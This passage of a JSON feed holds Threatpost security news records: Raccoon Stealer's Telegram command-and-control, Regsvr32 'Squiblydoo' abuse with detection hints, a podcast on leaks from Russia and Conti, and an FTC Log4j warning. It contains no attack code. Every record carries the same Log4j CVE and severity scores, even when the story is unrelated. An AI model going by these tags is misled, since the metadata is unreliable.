attacks,\u201d the report concluded.\n\n## Increasingly Targeting Critical Infrastructure\n\nThe report described an increasing volume of attacks against the West, \u201cespecially in the resources, government, media, financial and insurance industries,\u201d the report said. 
\u201cThe targeting of financial and insurance entities is due to the perception that they are the working arms of Western financial sanctions, whereas the targeting of utilities and resources entities is due to those organizations\u2019 importance as critical national infrastructure.\u201d\n\nCritical infrastructure will be of particular concern, especially if ransomware groups have the political motive \u2013 plus the tools of the rest of the underground community at their disposal.\n\n\u201cOrganizations within telecommunications, IT, government and critical infrastructure are no doubt on a heightened level of security with the current events in the geopolitical environment,\u201d James McQuiggan of KnowBe4 told Threatpost via email, but \u201ccybersecurity is finally becoming an important topic for the government, considering the number of attacks the various agencies have dealt with over the past number of years.\u201d\n\nIf the cyber onslaught in Ukraine extends West, will the United States and the European Union [be ready](<https://threatpost.com/ukrainian-ddos-attacks-should-put-us-on-notice-researchers/178498/>)?\n\nThe answer to that question may arrive soon.\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-14T13:52:37", "type": "threatpost", "title": "Cybercrooks\u2019 Political In-Fighting Threatens the West", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-14T13:52:37", "id": "THREATPOST:3DB85AFFEA9491ACBD8909D0CF5FBAEA", "href": "https://threatpost.com/cybercrooks-political-in-fighting-threatens-the-west/178899/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-11T15:13:04", "description": "A credential stealer that first rose to popularity a couple of years ago is now abusing Telegram for command-and-control (C2). 
A range of cybercriminals continue to widen its attack surface through creative distribution means like this, researchers have reported.\n\n[Raccoon Stealer](<https://threatpost.com/malwarebytes-copycat-site-raccoon-stealer/154638/>), which first appeared on the scene in April 2019, has added the ability to store and update its own actual C2 addresses on Telegram\u2019s infrastructure, according to a blog post published by [Avast Threat Labs](<https://decoded.avast.io/vladimirmartyanov/raccoon-stealer-trash-panda-abuses-telegram/>) this week. This gives them a \u201cconvenient and reliable\u201d command center on the platform that they can update on the fly, researchers said.\n\nThe malware \u2013 believed to be developed and maintained by Russia-affiliated cybercriminals \u2013 is at its core a credential stealer but is capable of a range of nefarious activity. It can steal not only passwords but also cookies, saved logins and forms data from browsers, login credentials from email clients and messengers, files from crypto wallets, data from browser plugins and extensions, and arbitrary files, based on commands from its C2.\n\n\u201cIn addition, it\u2019s able to download and execute arbitrary files by command from its C2,\u201d Avast Threat Labs researcher [Vladimir Martyanov](<https://decoded.avast.io/author/vladimirmartyanov/>) wrote in the post. 
This, in combination with active development and promotion on underground forums, makes Raccoon Stealer \u201cprevalent and dangerous,\u201d he said.\n\nUpon its release in 2019, cybercriminals [quickly adopted](<https://threatpost.com/raccoon-malware-steal-data/149525/>) the malware because of its user-friendly malware-as-a-service (MaaS) model, which has given them a quick and easy way to make money by stealing sensitive data.\n\n## **Creative Distribution**\n\nEarly on, attackers were seen delivering Raccoon Stealer [via an .IMG file](<https://threatpost.com/raccoon-stealer-malware-scurries-past-microsoft-messaging-gateways/150545/>) hosted on a hacker-controlled Dropbox account in business email compromise (BEC) campaigns that targeted financial institutions and other organizations.\n\nMore recently, Avast Threat Labs researchers observed a number of new and creative ways attackers are distributing Raccoon Stealer, Martyanov said.\n\n\u201cTaking into account that Raccoon Stealer is for sale, its distribution techniques are limited only by the imagination of the end buyers,\u201d he wrote.\n\nIn addition to being spread by two loaders \u2013 Buer Loader and GCleaner \u2013 attackers also are distributing Raccoon Stealer via fake game cheats, patches for cracked software \u2013 including hacks and mods for Fortnite, Valorant and NBA2K22 \u2013 or other software, Martyanov wrote.\n\nCybercriminals also are taking care to try to evade detection by packing the credential stealer, using Themida or malware packers, with some samples observed being packed more than five times in a row with the same packer, he added.\n\n## **Abusing C2 in Telegram**\n\nThe report detailed how the latest version of Raccoon Stealer communicates with C2 within Telegram: There are four \u201ccrucial\u201d values for its C2 communication, which are hardcoded in every Raccoon Stealer sample, according to the post. 
They are:\n\n * MAIN_KEY, which has been changed four times during the year;\n * URLs of Telegram gates with a channel name;\n * BotID, a hexadecimal string, sent to the C2 every time; and\n * TELEGRAM_KEY, a key to decrypt the C2 address obtained from Telegram Gate.\n\nTo hijack Telegram for its C2, the malware first decrypts MAIN_KEY, which it uses to decrypt Telegram gates URLs and BotID. The stealer then uses Telegram gate to get to its real C2 using a string of queries that eventually allow it to use the Telegram infrastructure to store and update actual C2 addresses, Martyanov wrote.\n\nBy downloading and executing arbitrary files from a command from C2, the stealer also is able to distribute malware. Avast Threat Labs collected about 185 files, with a total size of 265 megabytes \u2013 including downloaders, clipboard crypto stealers and the WhiteBlackCrypt ransomware \u2013 that were being distributed by Raccoon Stealer.\n\n## **Avoiding Russian Entities**\n\nOnce executed, Raccoon Stealer starts checking for the default user locale set on the infected device and won\u2019t work if it\u2019s one of the following: Russian, Ukrainian, Belarusian, Kazakh, Kyrgyz, Armenian, Tajik or Uzbek. This is likely because the developers themselves are Russian, researchers believe.\n\nHowever, Avast Threat Labs found that in recent activity, \u201cthe country where we have blocked the most attempts is Russia, which is interesting because the actors behind the malware don\u2019t want to infect computers in Russia or Central Asia,\u201d Martyanov wrote.\n\nThis could be because \u201cthe attacks spray and pray, distributing the malware around the world,\u201d he noted. 
The malware doesn\u2019t check for the location of the user until it actually reaches a device; if it finds that the device is located in a region developers don\u2019t want to target, it won\u2019t run.\n\n\u201cThis explains why we detected so many attack attempts in Russia; we block the malware before it can run, i.e. before it can even get to the stage where it checks for the device\u2019s locale,\u201d Martyanov wrote. \u201cIf an unprotected device that comes across the malware with its locale set to English or any other language that is not on the exception list but is in Russia, it would still become infected.\u201d\n\n**_Moving to the cloud? Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-11T15:03:20", "type": "threatpost", "title": "Raccoon Stealer Crawls Into Telegram", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", 
"version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-11T15:03:20", "id": "THREATPOST:65F4E74D349524EBAC2DA4A4ECF22DD8", "href": "https://threatpost.com/raccoon-stealer-telegram/178881/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-09T22:25:28", "description": "A Windows living-off-the-land binary ([LOLBin](<https://threatpost.com/cybersecurity-failing-ransomware/175637/>)) known as Regsvr32 is seeing a [big uptick](<https://github.com/uptycslabs/IOCs/tree/main/Attacker%20increasingly%20adopting%20Squiblydoo%20technique%20via%20office%20documents>) in abuse of late, researchers are warning, mainly spreading trojans like Lokibot and Qbot.\n\nLOLBins are legitimate, native utilities used daily in various computing environments, that cybercriminals use to evade detection by blending in to normal traffic patterns. In this case, Regsvr32 is a Microsoft-signed command line utility in Windows that allows users to register and unregister libraries. By registering a .DLL file, information is added to the central directory (the Registry) so that it can be used by Windows and shared among programs.\n\nThis long reach is catnip to cyberattackers, who can abuse the utility via the [\u201cSquiblydoo\u201d technique](<https://car.mitre.org/analytics/CAR-2019-04-003/>), Uptycs researchers warned.\n\n\u201cThreat actors can use Regsvr32 for loading COM scriptlets to execute DLLs,\u201d they explained in a [Wednesday writeup](<https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents>). \u201cThis method does not make changes to the Registry as the COM object is not actually registered, but [rather] is executed. 
This technique [allows] threat actors to bypass application whitelisting during the execution phase of the attack kill chain.\u201d\n\n## **The .OCX Connection**\n\nMalicious use of Regsvr32 has been cresting of late in the Uptycs telemetry, researchers warned, with cybercrooks specifically attempting to register .OCX files in the Registry via various types of malicious Microsoft Office documents. As a class, .OCX files contain ActiveX controls, which are code blocks that Microsoft developed to enable applications to perform specific functions, such as displaying a calendar.\n\n\u201cThe Uptycs Threat Research team has observed more than 500+ malware samples using Regsvr32.exe to register [malicious] .OCX files,\u201d researchers warned. \u201cDuring our analysis of these malware samples, we have identified that some of the malware samples belonged to [Qbot](<https://threatpost.com/revamped-qbot-trojan-packs-new-punch-hijacks-email-threads/158715/>) and [Lokibot](<https://threatpost.com/cisa-lokibot-stealer-resurgence/159495/>) attempting to execute .OCX files\u202697 percent of these samples belonged to malicious Microsoft Office documents such as Excel spreadsheet files.\u201d\n\nMost of the Microsoft Excel files observed in the attacks carry the .XLSM or .XLSB suffixes, they added, which are types that contain embedded macros. During the attack, these usually download or execute a malicious payload from the URL using the formulas in the macros.\n\nSimilarly, some campaigns use Microsoft Word, Rich Text Format data or Composite Document files (.DOC, .DOCX or .DOCM) embedded with malicious macros, according to Uptycs.\n\n## **Identifying Suspicious regsvr32 Executions**\n\nBecause Regsvr32, like other LOLBins, is used for legitimate daily operations, its abuse often evades traditional cybersecurity defenses. 
However, researchers noted that security teams can monitor for a couple of specific behaviors in order to track its activity:\n\n * Look for parent/child process relationships where Regsvr32 is executed with parent process of Microsoft Word or Microsoft Excel;\n * And, it can be identified by looking for Regsvr32 executions that load the scrobj.dll, which executes a COM scriptlet.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-09T21:56:49", "type": "threatpost", "title": "Cybercriminals Swarm Windows Utility Regsvr32 to Spread Malware", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-09T21:56:49", "id": "THREATPOST:8D57BD39C913E8DDC450DD9EF2564C2C", "href": "https://threatpost.com/cybercriminals-windows-utility-regsvr32-malware/178333/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": 
"2022-03-04T03:51:25", "description": "Information about nuclear plants and air force capabilities. Conti ransomware gang crooks [conjecturing](<https://krebsonsecurity.com/2022/03/conti-ransomware-group-diaries-part-i-evasion/>) that the National Security Agency (NSA) was maybe behind the mysterious, months-long [TrickBot](<https://threatpost.com/trickbot-amazon-paypal-top-brands/178483/>) [lull](<https://threatpost.com/trickbot-break-researchers-scratching-heads/178678/>). [Doxxed data](<https://www.theregister.com/2022/03/02/russian_soldier_leaks/>) about 120K Russian soldiers.\n\nThose are just some of the sensitive, valuable data that\u2019s being hacked out of Russia in the [cyber war zone](<https://threatpost.com/ukraine-russia-cyber-warzone-splits-cyber-underground/178693/>) \u2013 a war that erupted [even before](<https://threatpost.com/microsoft-ukraine-foxblade-trojan-hours-before-russian-invasion/178702/>) the country invaded Ukraine.\n\n\u201cEveryone is so focused on Russia hacking the world, but the world has been hacking Russia\u2026. And dumping a lot of critical data on military, nuclear plants, etc.,\u201d said Vinny Troia, cybersecurity Ph.D. and founder of [ShadowByte](<https://shadowbyte.com/>), a dark web threat intelligence and cyber fraud investigations firm.\n\nHe\u2019s one of an untold number of experts on dark-web threat intelligence who\u2019ve been poring over the intel that\u2019s been flooding out of practically every nook and cranny of the internet: data that\u2019s being posted on Twitter, Telegram and within the multiple dumps of insider knowledge about the Conti ransomware gang posted by the Ukrainian supporter ContiLeaks.\n\n\n\n(Brought to you by SpecOps. 
Underwriters of Threatpost podcasts do not assert any editorial control over content.)\n\nThat ongoing dump, which has included [source code](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) for Conti and TrickBot, a decryptor (that doesn\u2019t help recent victims whose files have been encrypted by the Conti gang, unfortunately), and much more, stopped yesterday when the Conti gang shut down its Jabber servers, Troia told Threatpost on Wednesday.\n\nHe visited the Threatpost podcast to update us on the mountain of data about Russia that intelligence experts are now slogging through.\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/030222_Vinny_Troia_mixdown.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>). Also, see below for a lightly edited transcript. \n\n\n## Lightly Edited Transcript\n\n**Lisa Vaas:** Listeners, welcome to the Threatpost podcast. My guest today is Vinny Troia, cybersecurity PhD and founder of ShadowByte, a dark web threat intelligence and cyber fraud investigations firm. Today, we\u2019re going to focus on all of the data that\u2019s being leaked on Russia as a result of its invasion of Ukraine.\n\n**Lisa Vaas:** Thanks for coming on the podcast. Vinny, before we jump in, could you give us a bit of your background, please?\n\n**Vinny Troia:** Sure. Thanks for having me. Yes. So my background I come from a DOD background did a lot of work for surface deployment command. And yeah, I was there for about, I think six or seven years before moving over to private sector.\n\n**Vinny Troia:** And while I was there, I did a lot of work in compliance and random security hacking projects, a lot of red teaming, pen testing. And then eventually I started my own firm. 
Fast forward to today, our focus now is primarily dealing with a lot of ransomware cases, incident response, and we do a lot of ransom negotiations as well.\n\n**Vinny Troia:** We\u2019re constantly focused on dark web threat actors and any of the players, really.\n\n**Lisa Vaas:** Thank you for that. And well this past week must be just a flurry with the dark web activity around Ukraine and Russia. So in an email, you were talking about how everyone is so focused on Russia hacking the world, but the world has been also hacking Russia and dumping a lot of critical data on military nuclear plants, etc.\n\n**Lisa Vaas:** Where is your Intel coming from? Are there any forums in particular that you\u2019re clued into or is that something you can\u2019t even discuss?\n\n**Vinny Troia:** it\u2019s not even like that. It\u2019s a, I mean, it\u2019s literally everywhere. I mean, there\u2019s Telegram channels. I mean, some is just being pasted right on Twitter.\n\n**Vinny Troia:** I mean, it\u2019s literally coming from all angles at this point.\n\n**Lisa Vaas:** Well, tell me what you\u2019re seeing.\n\n**Vinny Troia:** I\u2019d say last month, there was a lot of data coming out about Ukrainian citizens. I mean, a lot. So that was kind of interesting, almost like a precursor to what was happening.\n\n**Vinny Troia:** And now it\u2019s almost like, the rest of the world that\u2019s really pissed and started hacking back and you\u2019re seeing so much data coming out. I\u2019m actually looking for sorry, as we speak, I\u2019m going through some of this data. I mean, there\u2019s stuff on a nuclear plants, some of their air force capabilities.\n\n**Vinny Troia:** There\u2019s another database that I just recently came across that is about a hundred thousand of their military members with photos, passport numbers, things like that. I mean, it\u2019s really just data coming from all depths of. 
From other infrastructure,\n\n**Lisa Vaas:** well, who, who, who is the primary sources?\n\n**Lisa Vaas:** I mean, I know that anonymous of course has jumped in to, to, to wage war on behalf of Ukraine, cyber war on behalf of Ukraine. And I know that you can put out a call for help from cyber experts on this too. So who, who exactly is, is. Hacking this stuff out of Russia.\n\n**Vinny Troia:** I mean, I, honestly, I couldn\u2019t tell you, I mean, it\u2019s coming, like I said, it\u2019s coming from all sorts of places.\n\n**Vinny Troia:** Right. And when things get leaked, I mean, they just get leaked from various [sources\u2019] usernames on forums or Telegram channels. And so you never really know who it\u2019s coming from. It is interesting that the world kind of banded together against this. And Russia was supposed to have this big cyber arsenal against them.\n\n**Vinny Troia:** And it\u2019s really funny that Joe Biden didn\u2019t mention security once in the state of the union last night, being that it was such a big deal and everybody\u2019s been talking about it.\n\n**Lisa Vaas:** Yeah. And, and I remember it was an NBC news last week or, or was reporting on the big cyberattacks, the major offensive cyberattacks that were being discussed at the White House, but then the White House denied [considering offensive cyberattacks].\n\n**Vinny Troia:** The news has been all about cyberattacks and Russia\u2019s capabilities and it\u2019s such a priority, but it just wasn\u2019t even mentioned once. I just, I find that really strange, but regardless, it\u2019s nice that the world kind of banded together to really come after Russia. One of the most, honestly, just incredibly fascinating things is all these leaks that have been occurring regarding the Conti ransomware. Yes. And they\u2019re arguably the largest or at least one of the top few largest ransomware groups in the world. 
And I mean, they\u2019re just having everything leak: source code, recovery, keys, chat logs.\n\n**Vinny Troia:** I mean, as early, as recently as today with the most recent chat logs that came out, so somebody still has access to their servers and I haven\u2019t even had a chance to read the ones from today.\n\n**Lisa Vaas:** I just wrote up the second dump and I didn\u2019t even know there was more posted today. It\u2019s so hard to keep up. Can we talk a little bit about those dumps? Now as I understand it, it\u2019s the decryptor for version two of the Conti Lock ransomware software [that was leaked]. That\u2019s not even going to be usable to anybody because it was for an older version.\n\n**Lisa Vaas:** How is this going to affect Conti? Another one of my sources was telling me that just one of the gang\u2019s groups got hit by this [leak] and everybody else is pretty much doing fine. They\u2019re carrying on business as usual.\n\n**Vinny Troia:** I think what\u2019s really interesting. And they talked about this in one of the, in some of the logs. So Conti uses, or used, this one piece of software called TrickBot in order to disseminate and \u2026 one of the or groupings of the chat log showed that the NSA came after TrickBot specifically.\n\n**Vinny Troia:** I don\u2019t know whether or not they reverse engineered or what they did, but I mean, they were able to shut it down for a couple of weeks just by changing patch numbers and uploading them to a server that would accept the changes. And so what they did was they maxed out the maximum patch number.\n\n**Vinny Troia:** The software couldn\u2019t take any new updates at that point. So they effectively shut it down for a little bit. That was actually really amazing.\n\n**Lisa Vaas:** I totally missed that. Which repository was that in? 
What\u2019s the name of the repository?\n\n**Vinny Troia:** It\u2019s all JSON files.\n\n**Lisa Vaas:** Everybody knew that TrickBot pretty much shut down for a few months, but I didn\u2019t know that about the NSA piece.\n\n**Vinny Troia:** It\u2019s presumed to be the NSA, given the level of skill that was involved, we\u2019ll call it finesse. I would say it would have to be some government agency.\n\n**Lisa Vaas:** Was there chatter about the shutdown?\n\n**Vinny Troia:** Yeah, it\u2019s basically a handful of officials talking about it and how they were shut down and how they basically had to rebuild their infrastructure.\n\n**Vinny Troia:** They were down for a little bit and eventually they came back, but it just shows that they were being targeted by nation states. I think the most interesting thing is, if this really is a Russian operated group, which is what it seems like, then the fact that all these files are being leaked, whether it\u2019s from an insider or somebody who\u2019s a researcher who\u2019s attacking them specifically, I think this is going to have a major toll on Russia\u2019s finances, especially considering this is a group that is averaging what, a couple hundred million dollars a year recurring revenue?\n\n**Lisa Vaas:** I don\u2019t expect you to know this, but maybe you do: How much of Russia\u2019s economy is actually coming from ransomware or other malware?\n\n**Vinny Troia:** I think the majority, actually. So I think the majority of Russia\u2019s economy is coming from some sort of crime. There\u2019s not a whole lot going on over there. It\u2019s like a big wasteland,\n\n**Lisa Vaas:** Right. The underground members say \u201cprotect the motherland, the motherland protects you.\u201d Except for when they need some stooges to arrest, some low-level stooges to make the U.S. happy, which happened recently.\n\n**Vinny Troia:** As far as the decryptor [goes], you\u2019re correct. It is for an older version. 
I think I saw some keys floating around as well, but new code is written on top of old code and it\u2019s not like it was replaced completely. So I would imagine that there will be some fallout from that code base.\n\n**Lisa Vaas:** Yeah, there\u2019s a lot of code to go through, I hear. So what were some other really great finds in the intelligence that we\u2019re getting out of Russia during this crisis?\n\n**Vinny Troia:** It\u2019s information on citizens, it\u2019s information on military members. I\u2019ve seen things on nuclear plants. I can\u2019t speak to what can be done with all of it, honestly, but the point is it\u2019s there and, in the right hands, I\u2019m sure it could be pretty useful.\n\n**Lisa Vaas:** I assume, during these days, it\u2019s just not going to let up.\n\n**Vinny Troia:** No, and like I said, a couple of hours ago we had more leaks from their Jabber server. So I would imagine whoever has access has been able to pull off a lot, and I think [Conti] actually just shut it down finally.\n\n**Lisa Vaas:** So that means they shut down Jabber. That doesn\u2019t mean that they figured out who the leaker is. Right?\n\n**Vinny Troia:** The person leaking it goes by [ContiLeaks]. But whether or not he\u2019s the one with access, I don\u2019t know. But the point is they figured out that somebody did have access to their Jabber logs. So now they\u2019ve moved servers.\n\n**Lisa Vaas:** Well, awesome. What else can you tell listeners? What can you leave us with?\n\n**Vinny Troia:** I would say that, just because Conti\u2019s out doesn\u2019t mean that the problem is going away anytime soon. So be diligent and keep up with your passwords and make sure that you actually have fresh passwords, because looking at these logs and how they\u2019re getting into a lot of these systems, it\u2019s just using other people\u2019s recycled passwords.\n\n**Vinny Troia:** The hacks they\u2019re using aren\u2019t even that sophisticated. 
And I mean, even now the majority of hacks are still caused by reused passwords.\n\n**Lisa Vaas:** We can get some intelligence out of the exploits that they\u2019re targeting. I think I saw Zerologon was mentioned as one, and of course we know a lot about their tooling right now. Like the whole Cobalt Strike beacon thing.\n\n**Vinny Troia:** Cobalt Strike\u2019s been a red teaming tool forever. It\u2019s a staple. For pen testers, it\u2019s an amazing tool. And so the fact that they were using it isn\u2019t really a surprise.\n\n**Lisa Vaas:** Well, is there anything surprising that was found in the dumps? I know that we\u2019ve got email addresses of some of the members of the gang.\n\n**Vinny Troia:** You can use that to look for other accounts and potentially start to reverse back to maybe who they are. But I mean, there\u2019s so much information here. I haven\u2019t even gone through maybe a 10th of it. It\u2019s coming up too fast. It\u2019s a full-time job. It takes a full-time team at this point to go through all of this. Because then there was another thing that came out: Rocket.Chat logs from a Rocket.Chat. There\u2019s thousands of logs here.\n\n**Lisa Vaas:** Yeah, that\u2019s pretty bad. When you\u2019ve got a researcher, an intel expert who says he\u2019s getting too much: The firehose is open so wide. So the takeaways for listeners are that these leaks haven\u2019t stopped, and we don\u2019t even know how many that [ContiLeaks] is promising.\n\n**Vinny Troia:** I mean, the fact that today\u2019s leaks caused the shutdown, I presume caused a shut down of their Jabber server. I\u2019m going to say that well has pretty much run dry. I don\u2019t know what else is going to be released in terms of tools, but I\u2019d say all of this has probably put a dent in everything they\u2019re doing for a little bit.\n\n**Lisa Vaas:** We can hope so, but I don\u2019t think we should assume anything. 
And that\u2019s what you\u2019re telling us: They\u2019re still going to be active and they\u2019re going to retool anyway. Right. And will resurface.\n\n**Vinny Troia:** Yeah. I was going to say, giving credit to [security journalist Brian] Krebs on this one, one of the things he reported on was that there was a conversation, and I haven\u2019t even made it to the set about how the ransomware groups were being investigated.\n\n**Vinny Troia:** And someone high up in the group basically told them they didn\u2019t have anything to worry about. The investigation was going to go off of them. And that was right around the time that Russia took down REvil. So it was interesting. It\u2019s almost like they had insider information, or maybe they literally were working for [Russia].\n\n**Lisa Vaas:** I think REvil, that takedown, was the one I was thinking about when I alluded to this kind of token law enforcement action on Russia\u2019s part to maybe make the U.S. shut up. Now I have to go read Brian Krebs. Why didn\u2019t I read Brian Krebs earlier today? I have to do that. That\u2019s like a requirement of the job. OK, well, Vinny, unless you\u2019ve got anything else to add, I\u2019m going to let you go.\n\n**Vinny Troia:** No, all good.\n\n**Lisa Vaas:** I appreciate it. Thank you so much. Thanks for coming on the podcast.\n\n030322 10:49 UPDATE: ContiLeaks, the source of the Conti leaks, is not believed to be the same entity as vx_underground, which has disseminated the leaked files.\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** scheduled for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype. \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-03T16:31:36", "type": "threatpost", "title": "Russia Leaks Data From a Thousand Cuts\u2013Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-03T16:31:36", "id": "THREATPOST:6C547AAC30142F12565AB289E211C079", "href": "https://threatpost.com/russia-leaks-data-thousand-cuts-podcast/178749/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-05T19:44:48", "description": "The Federal Trade Commission (FTC) will muster its legal muscle to pursue companies and vendors that fail to protect consumer data [from the risks of](<https://threatpost.com/microsoft-rampant-log4j-exploits-testing/177358/>) the Log4j vulnerabilities, it [warned](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) on Tuesday.\n\n\u201cThe FTC intends to use its full legal authority to pursue companies that fail to take reasonable steps 
to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future,\u201d according to the warning.\n\nThose companies that bungle consumer data, leaving vulnerabilities unpatched and thus opening the door to exploits and the resulting possible \u201closs or breach of personal information, financial loss and other irreversible harms,\u201d are risking consequences tied to weighty laws that have resulted in fat fines, the FTC said.\n\nIt mentioned, among others, the [Federal Trade Commission Act](<https://www.ftc.gov/enforcement/statutes/federal-trade-commission-act>) and the [Gramm-Leach-Bliley Act](<https://threatpost.com/privacy-regulation-could-be-a-test-for-states-rights/138303/>). The FTC Act, the commission\u2019s primary statute, enables it to seek monetary redress and other relief for conduct injurious to consumers. [Gramm-Leach-Bliley](<https://www.ftc.gov/tips-advice/business-center/privacy-and-security/gramm-leach-bliley-act>) requires financial institutions to safeguard sensitive data.\n\n\u201cIt is critical that companies and their vendors relying on Log4j act now, in order to reduce the likelihood of harm to consumers, and to avoid FTC legal action,\u201d the FTC urged.\n\nThe FTC means it: Its warning included a reference to the complaints against Equifax, which agreed to pay $700 million to settle actions by the FTC, the Consumer Financial Protection Bureau, and all fifty states over its infamous [2017 data leak](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (consumers\u2019 reaction at the time: [Make it hurt more](<https://threatpost.com/200k-sign-petition-against-equifax-data-breach-settlement/148560/>)).\n\nAccording to the Equifax complaint, its failure to patch a known vulnerability \u201cirreversibly exposed the personal information of 147 million consumers.\u201d Expect more of the same if your company fails to protect consumer data from exposure as a result of 
